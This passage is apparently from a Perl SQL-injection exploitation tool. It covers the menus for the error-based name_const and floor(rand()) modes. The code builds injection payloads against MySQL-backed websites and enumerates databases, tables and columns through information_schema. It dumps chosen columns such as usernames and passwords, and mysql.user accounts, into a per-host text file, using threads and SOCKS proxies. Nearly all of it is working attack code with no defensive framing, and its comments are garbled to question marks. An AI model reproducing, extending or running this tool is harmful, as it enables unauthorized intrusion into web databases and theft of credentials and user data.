3796.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
3797.             $str = "0x" . $str;
3798.             return $str;
3799.      }
3800.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
3801.      print "-----------------------------------------\n";
3802.      print "Enter the DB-name: ";
3803.      $choice = <STDIN>;
3804.      chomp $choice;
3805.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
3806.      print "DB-name: $choice\n";
3807.      print "----------\n";
3808.      $choice1 = ascii_to_hex $choice;
3809.      ## ???-?? tables ? information_schema.schemata ##
3810.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
3811.      $nc_start1 = $nc_start . $temp;
3812.      $nc_midle1 = $nc_midle . $temp;
3813.      $current = $nc_start1 . $nc_midle1 . $nc_end;
3814.      $content = scan_url();
3815.      $bd_num = $content;
3816.      $bd_num =~ m/ussr(.*?)ussr/img;
3817.      $bd_num = $1;
3818.      print FILE "-----------------------------------------\n";
3819.      print FILE "Tables in $choice: $bd_num\n";
3820.      print FILE "-----------------------------------------\n";
3821.      print "-----------------------------------------\n";
3822.      print "Tables in $choice: $bd_num\n";
3823.      print "-----------------------------------------\n";
3824.      $num = -1; # ?? ????????
3825.      $thr = $kol_threads; # ???-?? ???????
3826.      print "Request method - $method\n";
3827.      print "Threads - $kol_threads\n";
3828.      print "Proxy - $proxy_message\n";
3829.      print "----------------------\n";
3830.      for(0..$thr) {
3831.          $trl[$_] = threads->create(\&gets5050222);
3832.      }
3833.      for(0..$thr) {
3834.          $trl[$_]->join;
3835.      }
3836.      sub gets5050222 {
3837.        $| = 1;
3838.        while ($num<$bd_num) {
3839.          { lock($num);
3840.          $num++; }
3841.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
3842.           $nc_start1 = $nc_start . $temp;
3843.          $nc_midle1 = $nc_midle . $temp;
3844.          $current = $nc_start1 . $nc_midle1 . $nc_end;
3845.          $content = scan_url();
3846.          if ($content =~ m/ussr(.*?)ussr/img) {
3847.                   print $1 . "\n";
3848.                   print FILE $1 . "\n";
3849.          }
3850.          print $num . "\r";
3851.          sleep $pause;
3852.  
3853.        }
3854.      }
3855.     print "----------\n";
3856.     print "Saved in " . "z_" . $host . ".txt\n";
3857.     close(FILE);
3858.     goto START200;
3859. } # end tables from DB
3860. # columns tables from tables from DB
3861. if ($choice == 4) {
3862.      sub ascii_to_hex ($) {
3863.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
3864.             $str = "0x" . $str;
3865.             return $str;
3866.      }
3867.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
3868.      print "-----------------------------------------\n";
3869.      print "Enter the DB-name: ";
3870.      $choice = <STDIN>;
3871.      chomp $choice;
3872.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
3873.      $choice1 = ascii_to_hex $choice;
3874.      print "DB-name: $choice\n";
3875.      print "----------\n";
3876.      $choice1 = ascii_to_hex $choice;
3877.      print "-----------------------------------------\n";
3878.      print "Enter the TABLE-name: ";
3879.      $choice2 = <STDIN>;
3880.      chomp $choice2;
3881.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
3882.        $choice3 = ascii_to_hex $choice2;
3883.      print "TABLE-name: $choice2\n";
3884.      print "----------\n";
3885.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
3886.      $nc_start1 = $nc_start . $temp;
3887.      $nc_midle1 = $nc_midle . $temp;
3888.      $current = $nc_start1 . $nc_midle1 . $nc_end;
3889.        $content = scan_url();
3890.      $bd_num = $content;
3891.      $bd_num =~ m/ussr(.*?)ussr/img;
3892.      $bd_num = $1;
3893.      print FILE "-----------------------------------------\n";
3894.      print FILE "Columns in [$choice.$choice2]: $bd_num\n";
3895.      print FILE "-----------------------------------------\n";
3896.      print "-----------------------------------------\n";
3897.      print "Columns in [$choice.$choice2]: $bd_num\n";
3898.      print "-----------------------------------------\n";
3899.      $num = -1; # ?? ????????
3900.      $thr = $kol_threads; # ???-?? ???????
3901.      print "Request method - $method\n";
3902.      print "Threads - $kol_threads\n";
3903.      print "Proxy - $proxy_message\n";
3904.      print "----------------------\n";
3905.      for(0..$thr) {
3906.          $trl[$_] = threads->create(\&gets5050333);
3907.      }
3908.      for(0..$thr) {
3909.          $trl[$_]->join;
3910.      }
3911.      sub gets5050333 {
3912.        $| = 1;
3913.        while ($num<$bd_num) {
3914.          { lock($num);
3915.          $num++; }
3916.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
3917.           $nc_start1 = $nc_start . $temp;
3918.          $nc_midle1 = $nc_midle . $temp;
3919.          $current = $nc_start1 . $nc_midle1 . $nc_end;
3920.          $content = scan_url();
3921.          if ($content =~ m/ussr(.*?)ussr/img) {
3922.                   print $1 . "\n";
3923.                   print FILE $1 . "\n";
3924.          }
3925.          print $num . "\r";
3926.          sleep $pause;
3927.  
3928.        }
3929.      }
3930.     print "----------\n";
3931.     print "Saved in " . "z_" . $host . ".txt\n";
3932.     close(FILE);
3933.     goto START200;
3934. } # end columns tables from tables from DB
3935. if ($choice==5) {
3936.      sub ascii_to_hex ($) {
3937.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
3938.             $str = "0x" . $str;
3939.             return $str;
3940.      }
3941.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
3942.      ## ???-?? ?????? ? information_schema.tables ##
3943.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . "0,1)";
3944.      $nc_start1 = $nc_start . $temp;
3945.      $nc_midle1 = $nc_midle . $temp;
3946.      $url11 = $nc_start1 . $nc_midle1 . $nc_end;
3947.      $current = $url11;
3948.      $content = scan_url();
3949.      $tab_num = $content;
3950.      $tab_num =~ m/ussr(.*?)ussr/img;
3951.      $tab_num = $1-1; # ???-?? ???????? ? informaion_schema
3952.      print "-----------------------------------------\n";
3953.      print "Tables in information_schema.tables - $1\n";
3954.      print "-----------------------------------------\n";
3955.      ## start from2 ##
3956.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
3957.      $choice = <STDIN>;
3958.      chomp $choice;
3959.      $thr = $kol_threads; # ???-?? ???????
3960.      if ($choice == 1) {
3961.           $num = -1; # ?? ????????
3962.      } else {
3963.           print "Enter START_position: ";
3964.           $choice1 = <STDIN>;
3965.           chomp $choice1;
3966.           $num = $choice1-2;
3967.           print "Enter END_position: ";
3968.           $choice2 = <STDIN>;
3969.           chomp $choice2;
3970.           $tab_num = $choice2-1;
3971.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
3972.      }
3973.      print "-----------------------------------------\n";
3974.      ## end from2
3975.      print FILE  "-----------------------------------------\n";
3976.      print FILE  "Tables in information_schema.tables - $1\n";
3977.      print FILE  "-----------------------------------------\n";
3978.      print "Request method - $method\n";
3979.      print "Threads - $kol_threads\n";
3980.      print "Proxy - $proxy_message\n";
3981.      print "----------------------\n";
3982.      for(0..$thr) {
3983.          $trl[$_] = threads->create(\&gets112);
3984.      }
3985.      for(0..$thr) {
3986.          $trl[$_]->join;
3987.      }
3988.      sub gets112 {
3989.        $| = 1;
3990.        while ($num<$tab_num) {
3991.          { lock($num);
3992.          $num++; }
3993.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
3994.          $nc_start1 = $nc_start . $temp;
3995.          $nc_midle1 = $nc_midle . $temp;
3996.          $current = $nc_start1 . $nc_midle1 . $nc_end;
3997.          $content = scan_url();
3998.          if ($content =~ m/ussr(.*?)ussr/img) {
3999.                   print $1 . "\n";
4000.                   print FILE $1 . "\n";
4001.          }
4002.          print $num . "\r";
4003.          sleep $pause;
4004.  
4005.        }
4006.      }
4007.     print "----------\n";
4008.     print "Saved in " . "z_" . $host . ".txt\n";
4009.     close(FILE);
4010.     goto START200;
4011. }#end 2
4012. if ($choice==6) {
4013.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4014.     print "-----------------------------------------\n";
4015.     print "Enter the table_name: ";
4016.     $choice = <STDIN>;
4017.     chomp $choice;
4018.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4019.     print "Table: $choice\n";
4020.     print "----------\n";
4021.     print FILE  "-----------------------------------------\n";
4022.     print FILE  "Table [ $choice ]\n";
4023.     print FILE  "-----------------------------------------\n";
4024.     $choice1 = ascii_to_hex $choice;
4025.     $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
4026.     $nc_start1 = $nc_start . $temp;
4027.     $nc_midle1 = $nc_midle . $temp;
4028.     $current = $nc_start1 . $nc_midle1 . $nc_end;
4029.     $content = scan_url();
4030.     $prefix = $content;
4031.     $prefix =~ m/ussr(.*?)ussr/img;
4032.     $prefix = $1; # ??, ? ??????? ???????
4033.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
4034.     print "Database for $choice: $prefix\n";
4035.     print FILE  "Database for $choice: $prefix\n";
4036.     $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1;
4037.     $nc_start1 = $nc_start . $temp;
4038.     $nc_midle1 = $nc_midle . $temp;
4039.     $current = $nc_start1 . $nc_midle1 . $nc_end;
4040.     $content = scan_url();
4041.     $colum_number = $content;
4042.     $colum_number =~ m/ussr(.*?)ussr/img;
4043.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
4044.     $full_table_name = $prefix . "." . $choice;
4045.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
4046.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
4047.     print "----------\n";
4048.     ## ?????? ??????? ##
4049.     $thr = $kol_threads; # ???-?? ???????
4050.     $num = -1; # ?? ????????
4051.     print "Request method - $method\n";
4052.     print "Threads - $kol_threads\n";
4053.     print "Proxy - $proxy_message\n";
4054.     print "----------------------\n";
4055.     print FILE  "Columns in " . $full_table_name . "\n";
4056.     for(0..$thr) {
4057.          $trl[$_] = threads->create(\&gets113);
4058.     }
4059.     for(0..$thr) {
4060.          $trl[$_]->join;
4061.     }
4062.     sub gets113 {
4063.        $| = 1;
4064.        while ($num<$colum_number) {
4065.          { lock($num);
4066.          $num++; }
4067.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
4068.          $nc_start1 = $nc_start . $temp;
4069.          $nc_midle1 = $nc_midle . $temp;
4070.          $current = $nc_start1 . $nc_midle1 . $nc_end;
4071.          $content = scan_url();
4072.          if ($content =~ m/ussr(.*?)ussr/img) {
4073.                   print "   " . $1 . "\n";
4074.                   print FILE "  "  . $1 . "\n";
4075.          }
4076.          print $num . "\r";
4077.          sleep $pause;
4078.  
4079.        }
4080.     }
4081.     print FILE "----------\n";
4082.     print "----------\n";
4083.     print "Saved in " . "z_" . $host . ".txt\n";
4084.     close(FILE);
4085.     goto START200;
4086. }# end 3
4087. if ($choice==7) {
4088.     sub ascii_to_hex ($) {
4089.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
4090.                $str = "0x" . $str;
4091.              return $str;
4092.     }
4093.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4094.     if ($full_table_name) {
4095.        print "-----------------------------------------\n";
4096.        print "Use last parsed table: $full_table_name ? (1/0): ";
4097.        $choice = <STDIN>;
4098.        chomp $choice;
4099.        if ($choice==1) {
4100.              $table_name = $full_table_name;
4101.              print "Table: $table_name\n";
4102.              print "----------\n";
4103.        } else {
4104.              print "-----------------------------------------\n";
4105.              print "Enter the table_name: ";
4106.              $choice = <STDIN>;
4107.              chomp $choice;
4108.              if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4109.              $table_name = $choice;
4110.              print "-----------------------------------------\n";
4111.              print "MySQL>=5 or MySql<5? (1/0): ";
4112.              $choice = <STDIN>;
4113.              chomp $choice;
4114.              if ($choice == 1) {
4115.                   $choice1 = ascii_to_hex $table_name;
4116.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
4117.                   $nc_start1 = $nc_start . $temp;
4118.                   $nc_midle1 = $nc_midle . $temp;
4119.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
4120.                   $content = scan_url();
4121.                   $prefix = $content;
4122.                   $prefix =~ m/ussr(.*?)ussr/img;
4123.                   $prefix = $1; # ??, ? ??????? ???????
4124.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
4125.                   $table_name = $prefix . "." . $table_name;
4126.              }
4127.              print "Table: $table_name\n";
4128.              print "----------\n";
4129.        }
4130.     } else {
4131.        print "-----------------------------------------\n";
4132.        print "Enter the table_name: ";
4133.        $choice = <STDIN>;
4134.        chomp $choice;
4135.        if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4136.        $table_name = $choice;
4137.        print "-----------------------------------------\n";
4138.        print "MySQL>=5 or MySql<5? (1/0): ";
4139.        $choice = <STDIN>;
4140.        chomp $choice;
4141.        if ($choice == 1) {
4142.                   $choice1 = ascii_to_hex $table_name;
4143.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
4144.                   $nc_start1 = $nc_start . $temp;
4145.                   $nc_midle1 = $nc_midle . $temp;
4146.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
4147.                   $content = scan_url();
4148.                   $prefix = $content;
4149.                   $prefix =~ m/ussr(.*?)ussr/img;
4150.                   $prefix = $1; # ??, ? ??????? ???????
4151.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
4152.                   $table_name = $prefix . "." . $table_name;
4153.        }
4154.        print "Table: $table_name\n";
4155.        print "----------\n";
4156.     }
4157.     print "-----------------------------------------\n";
4158.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
4159.     $choice = <STDIN>;
4160.     chomp $choice;
4161.     $column_name = $choice;
4162.     print FILE  "-----------------------------------------\n";
4163.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
4164.     print FILE  "-----------------------------------------\n";
4165.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
4166.     print "-----------------------------------------\n";
4167.     print "Do you want add condition to sql-query?\n";
4168.     print "----------\n";
4169.     print "for example - where id=1 ? (1/0): ";
4170.     $choice = <STDIN>;
4171.     chomp $choice;
4172.     if ($choice==1) {
4173.         print "-----------------------------------------\n";
4174.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
4175.         print "----------\n";
4176.         $choice = <STDIN>;
4177.         chomp $choice;
4178.         $where = $choice;
4179.         # ?????????:
4180.         ($con,$whe) = split(/=/,$where);
4181.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
4182.         print "Your condition: [ where $where ]\n";
4183.         $condition=1;
4184.     } else {
4185.         $condition=0;
4186.     }
4187.     if ($condition==0) {
4188.          print "----------\n";
4189.          ## ?????? ???-?? ???????? ?? ??????? #
4190.          print "Count data from [ $table_name  ]\n";
4191.          $temp = "(select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "limit" . $nc_plus . "0,1)";
4192.          $nc_start1 = $nc_start . $temp;
4193.          $nc_midle1 = $nc_midle . $temp;
4194.          $current = $nc_start1 . $nc_midle1 . $nc_end;
4195.          $content = scan_url();
4196.          $column_name_p = $content;
4197.          $column_name_p =~ m/ussr(.*?)ussr/img;
4198.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
4199.          print "$column_name_p\n";
4200.          print "----------\n";
4201.          ## start from2 ##
4202.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
4203.          $choice = <STDIN>;
4204.          chomp $choice;
4205.          $thr = $kol_threads; # ???-?? ???????
4206.          if ($choice == 1) {
4207.               $num = -1; # ?? ????????
4208.          } else {
4209.               print "Enter START_position: ";
4210.               $choice1 = <STDIN>;
4211.               chomp $choice1;
4212.               $num = $choice1-2;
4213.               print "Enter END_position: ";
4214.               $choice2 = <STDIN>;
4215.               chomp $choice2;
4216.               $column_name_p = $choice2-1;
4217.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
4218.          }
4219.          print "-----------------------------------------\n";
4220.          print "Request method - $method\n";
4221.          print "Threads - $kol_threads\n";
4222.          print "Proxy - $proxy_message\n";
4223.          print "----------------------\n";
4224.          ## end from2
4225.          ## ?????? ?????? ?? ??????? ##
4226.          for(0..$thr) {
4227.              $trl[$_] = threads->create(\&gets114);
4228.          }
4229.          for(0..$thr) {
4230.              $trl[$_]->join;
4231.          }
4232.          sub gets114 {
4233.             $| = 1;
4234.             while ($num<$column_name_p) {
4235.                { lock($num);
4236.                $num++; }
4237.                $temp = "(select" . $nc_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
4238.                $nc_start1 = $nc_start . $temp;
4239.                $nc_midle1 = $nc_midle . $temp;
4240.                $current = $nc_start1 . $nc_midle1 . $nc_end;
4241.                $content = scan_url();
4242.                if ($content =~ m/ussr(.*?)ussr/imgs) {
4243.                     print "   " . $1 . "\n";
4244.                     print FILE "  "  . $1 . "\n";
4245.                }
4246.                print $num . "\r";
4247.                sleep $pause;
4248.  
4249.             }
4250.          }
4251.     print "----------\n";
4252.     print "Saved in " . "z_" . $host . ".txt\n";
4253.     close(FILE);
4254.     goto START200;
4255.     } else {
4256.     ## ?????? ?????? ?? ??????? ##
4257.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
4258.          $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "where" . $nc_plus . $where;
4259.          $nc_start1 = $nc_start . $temp;
4260.          $nc_midle1 = $nc_midle . $temp;
4261.          $current = $nc_start1 . $nc_midle1 . $nc_end;
4262.          $content = scan_url();
4263.          $column_name_p = $content;
4264.          $column_name_p =~ m/ussr(.*?)ussr/img;
4265.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
4266.          print "$column_name_p\n";
4267.          print "----------\n";
4268.          ## start from2 ##
4269.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
4270.          $choice = <STDIN>;
4271.          chomp $choice;
4272.          $thr = $kol_threads; # ???-?? ???????
4273.          if ($choice == 1) {
4274.               $num = -1; # ?? ????????
4275.          } else {
4276.               print "Enter START_position: ";
4277.               $choice1 = <STDIN>;
4278.               chomp $choice1;
4279.               $num = $choice1-2;
4280.               print "Enter END_position: ";
4281.               $choice2 = <STDIN>;
4282.               chomp $choice2;
4283.               $column_name_p = $choice2-1;
4284.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
4285.          }
4286.          print "-----------------------------------------\n";
4287.          print "Request method - $method\n";
4288.          print "Threads - $kol_threads\n";
4289.          print "Proxy - $proxy_message\n";
4290.          print "----------------------\n";
4291.          ## end from2
4292.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
4293.          for(0..$thr) {
4294.              $trl[$_] = threads->create(\&gets115);
4295.          }
4296.          for(0..$thr) {
4297.              $trl[$_]->join;
4298.          }
4299.          sub gets115 {
4300.             $| = 1;
4301.             while ($num<$column_name_p) {
4302.                { lock($num);
4303.                $num++; }
4304.                $temp = "(select" . $nc_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "where" . $nc_plus . $where . $nc_plus . "limit" . $nc_plus . $num . ",1" ;
4305.                $nc_start1 = $nc_start . $temp;
4306.                $nc_midle1 = $nc_midle . $temp;
4307.                $current = $nc_start1 . $nc_midle1 . $nc_end;
4308.                $content = scan_url();
4309.                if ($content =~ m/ussr(.*?)ussr/img) {
4310.                     print "   " . $1 . "\n";
4311.                     print FILE "  "  . $1 . "\n";
4312.                }
4313.                print $num . "\r";
4314.                sleep $pause;
4315.  
4316.             }
4317.          }
4318.          print "----------\n";
4319.          print "Saved in " . "z_" . $host . ".txt\n";
4320.          close(FILE);
4321.          goto START200;
4322.     }
4323. }# end 4
4324. if ($choice == 8) {goto START}
4325. } #end name_const
4326. ########################################################
4327. # floor(rand())
4328. if ($choice == 12) {
4329. if ($f_url =~ m/^https:\/\/?([^\/]+)/i) {
4330.    $host13 = $1;
4331.    $https_flag = 1;
4332.    print "----------------------\n";
4333.    print "HTTPS mode enabled\n";
4334.    print "----------------------\n";
4335. }
4336. $host = $host13;
4337. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
4338.     print "-----------------------------------------\n";
4339.     print "Authorization required, wait please....";
4340.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
4341.     $ck1 = collect($answ1);
4342.     $https_auth_check = 1;
4343.     print " DONE\n";
4344.     print "-----------------------------------------\n";
4345. }
4346. if ($use_socks == 1 && $socks_check == 0) {
4347.   $check_url = $host;
4348.   our $query = "GET / HTTP/1.$http_protocol\r\n"
4349.            . "Host: $check_host\r\n"
4350.            . "Referer: http://" . $check_url . "\r\n"
4351.            . "Accept: */*\r\n"
4352.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
4353.            . "Connection: close\r\n\r\n";
4354.    print "----------------------------------------\n";
4355.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
4356.    print "Timeout = 5 sec:\n";
4357.    print "----------------------------------------\n";
4358.    $socks_check = 0;
4359.    $check_socks = socks_check();
4360.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
4361.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
4362.   if ($current_proxy_host) {
4363.      $socks_check = 1;
4364.      print "Will use --> $proxy_message\n";
4365.   } else {
4366.      $socks_check = 0;
4367.      $proxy_message = "No";
4368.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
4369.   }
4370. }
4371. START2001:
4372. print "-------------------------------------------------------------------\n";
4373. print "               Choose mode:\n";
4374. print "-------------------------------------------------------------------\n";
4375. print "    [1] floor(rand()) - system information\n";
4376. print "    [2] floor(rand()) - get DB-names from information_schema.schemata\n";
4377. print "    [3] floor(rand()) - get tables from DB-name\n";
4378. print "    [4] floor(rand()) - get column_name from tables from DB-name\n";
4379. print "    [5] floor(rand()) - get tables from information_schema (current DB)\n";
4380. print "    [6] floor(rand()) - get column_name from table (current DB)\n";
4381. print "    [7] floor(rand()) - get data from columns\n";
4382. print "    [8] floor(rand()) - Mysql4 inj brute tables and columns\n";
4383. print "-------------------------------------------------------------------\n";
4384. print "    [9] Main menu\n";
4385. print "-------------------------------------------------------------------\n";
4386. if($sql_flag == 0){
4387.     $ff_url = $f_url;
4388. } elsif ($sql_flag == 1) {#POST
4389.     $ff_url = $sql_post;
4390. } elsif($sql_flag == 2){#HEADER
4391.     $ff_url = $sql_header;
4392. }
4393. $choice = <STDIN>;
4394. chomp $choice;
4395. print "Your choice: $choice\n";
4396. if ($choice==1) {
4397.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
4398.      #### ?????? ?????? #####################################################
4399.      $url1 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4400.      #### ?????? ??? ???? #####################################################
4401.      $url2 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4402.      #### ?????? ????? #####################################################
4403.      $url3 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x757365723a,user()" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4404.      #### ?????? @@basedir #####################################################
4405.      $url4 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4406.      #### ?????? @@datadir #####################################################
4407.      $url5 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4408.      #### ?????? @@tmpdir #####################################################
4409.      #$temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
4410.      $url6 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4411.      #### ?????? @@version_compile_os #####################################################
4412.      #$temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
4413.      $url7 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4414.      #### ?????? mysql.user #####################################################
4415.      $url8 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4416.      #### ?????? mysql.password #####################################################
